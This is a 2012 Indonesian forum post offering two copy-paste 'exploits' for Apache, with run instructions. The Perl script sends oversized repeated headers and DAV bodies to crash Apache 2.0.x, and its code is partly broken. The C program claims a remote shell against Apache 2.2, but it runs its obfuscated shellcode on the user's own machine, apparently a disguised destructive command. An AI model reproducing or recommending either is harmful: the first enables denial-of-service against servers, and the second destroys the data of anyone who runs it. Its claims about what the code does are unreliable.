digitalcat BC Security
Jumlah posting : 451 Points : 710 Reputation : 28 Join date : 31.10.11 Age : 42
| Subyek: Exploit Apache 2.0.37-2.2.11 Tue May 01, 2012 8:28 pm | |
| Exploit Apache 2.0.37 - 2.0.45 By Matthew Murphy[Perl] Gunakan ActivePerl 5.8.x Cukup masukan IP Address port username dan password yang diinginkan Code Copy paste save as->Apache2.0.pl : - Code:
-
#!/usr/bin/perl # # Apache 2.0.37 - 2.0.45 APR Exploit # Written By Matthew Murphy # $BASE64_CMD_STRING = "use_base64_encoder_here %s";
$BASE64_USE_STDIN = 0;
$BASE64_WRITE_NL = "";
use IO::Socket; print STDOUT "Apache 2.0.37 - 2.0.45 Exploit\r\n"; print STDOUT "By Matthew Murphy\r\n\r\n"; print STDOUT "Enter the hostname/IP address of the server: "; $line = <STDIN>; $host = mychomp($line); print STDOUT "Enter the port of the server \[80\]: "; $line = <STDIN>; $port = mychomp($line); print STDOUT "Use authentication credentials for the session \[Y/N\]? "; $line = <STDIN>; $char = mychomp($line); if ($char == "Y" || $char == "y") { print STDOUT "What username shall we use: "; $line = <STDIN>; $user = mychomp($line); print STDOUT "What password shall we use: "; $line = <STDIN>; $pass = mychomp($line); $auth = "$user:$pass"; if ($BASE64_USE_STDIN) { # l33t Perl piping trix; NOTE: This is definitely # Alpha code! :-) pipe(STDOUTREAD, STDOUTWRITE); pipe(STDINREAD, STDINWRITE); open(OLDSTDIN, "&STDIN"); open(OLDSTDOUT, ">&STDOUT"); open(STDIN, "&STDINREAD"); open(STDOUT, ">&STDOUTWRITE"); close(STDINREAD); close(STDOUTWRITE); system($BASE64_CMD_STRING); open(STDIN, "&OLDSTDIN"); open(STDOUT, "&>OLDSTDOUT"); close(OLDSTDIN); close(OLDSTDOUT); print STDINWRITE $auth; close(STDINWRITE); read(STDOUTREAD, $base64, 4096); # Edit for insane passwords close(STDOUTREAD); } else { open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|"); read(READOUTPUT, $base64, 4096); # See above close(READOUTPUT); } $base64 = join("", split(/ /, $base64)); } else { $base64 = undef; } $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1"); print STDOUT "Exploiting a proxy server \[Y/N\]? "; $line = <STDIN>; $char = mychomp($line); if ($char == "Y" || $char == "y") { print $f "GET / HTTP/1.1\x0d\x0a";
# Apache 2.0.37 - 2.0.45 tries to limit header inputs, but uses a hash table # that ultimately concatenates multiple headers of the same name # together with ", " between them, so: # # Host: a # Host: b # # Bypasses Apache's buffer size checks, but ends up as: # # Host: a,b # # When processed. Confirm this with a TRACE against your server: # # TRACE / HTTP/1.1 # Host: a # Host: b # # The "message/http" body you receive will contain: # # TRACE / HTTP/1.1 # Host: a,b # # So, for those of you who are confused by this code fragment, # this is what it ultimately achieves! for ($i = 0; $i < 10; $i++) { print $f "Host: ".("A"x2000)."\r\n"; } if (defined($base64)) { print $f "Proxy-Authorization: Basic ".$base64."\r\n"; } print $f "\r\n"; } else { print STDOUT "What resource should be probed: "; $line = <STDIN>; $res = mychomp($line); print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] "; $line = <STDIN>; $char = mychomp($line); if ($char == "Y" || $char == "y") { $xmlbody = "<?xml version=\"1.0\"?>\r\n"; $xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n"; $xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n"; $xmlbody.= "</D:propfind>";
# HTTP headers print $f "PROPFIND $res HTTP/1.1\r\n"; print $f "Host: $host:$port\r\n"; print $f "Depth: 1\r\n"; print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n"; print $f "Content-Length: ".length($body)."\r\n\r\n"; if (defined($base64)) { print $f "Authorization: Basic ".$base64."\r\n"; } print $f "$xmlbody\r\n\r\n"; } else { # This does *almost* the exact same thing as the mod_proxy # code, and could be considered wasteful, but a few extra # CPU cycles never killed anybody. :-( print $f "GET $res HTTP/1.1\r\n"; for ($i = 0; $i < 10; $i++) { print $f "Host: ".("A"x2000)."\r\n"; } if (defined($base64)) { print $f "Authorization: Basic ".$base64."\r\n"; } print $f "\r\n"; } } while (defined($ln = <$f>)) { print STDOUT $ln; } undef $f; exit;
sub mychomp { my $data; my $arg = shift; my $CRLF; if ($^O == "MSWin32") { $CRLF = 1; } else { $CRLF = 0; } $data = substr($arg, 0, length($arg) - $CRLF); return $data; }
-------------------------------------------------------------------------- Exploit Apache 2.2.0 - 2.2.11Compile: - Code:
-
gcc apache.c
atau
Compile: gcc apache.c -o apache
Pengunaan : - Code:
-
./a.out <hostname> <port>
atau
./apache <hostname> <port>
Setelah di compile, contoh : - Code:
-
./apache 127.0.0.1 80
lakukan koneksi dengan netcat di port "12345" Code Copy paste save as->apache.c : - Code:
-
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <unistd.h> #include <stdlib.h>
void usage(char *argv[]) { printf("Usage: %s <hostname> <port>\n\n",argv[0]); exit(1); }
int main(int argc,char *argv[]) { char *shellcode= "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50" "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50" "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50" "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50" "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50" "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53" "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80"; int (*sc)()=(int(*)())shellcode; char host[100]; int sd; struct sockaddr_in sin; struct sockaddr_in pin; struct hostent *hp; char *evilreq=malloc(4096); pid_t pid;
if (argc!=3) usage(argv); strcpy(host,argv[1]); if ((hp = gethostbyname(host)) == 0) { perror("gethostbyname"); exit(2); } memset(&pin, 0, sizeof(pin)); pin.sin_family = AF_INET; pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr; pin.sin_port = htons(atoi(argv[2]));
if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); }
if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) { perror("connect"); exit(3); } printf("Connected,...\n"); sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode); if (send(sd, evilreq, strlen(evilreq), 0) == -1) { perror("send"); exit(1); } printf("Waiting some seconds...\n"); pid=fork(); if (pid==0) {close(2);sc();exit(0);} else { sleep(2); if (sd) { printf("Now type nc %s 12345 \n",argv[1]); close(sd); } } }
| |
|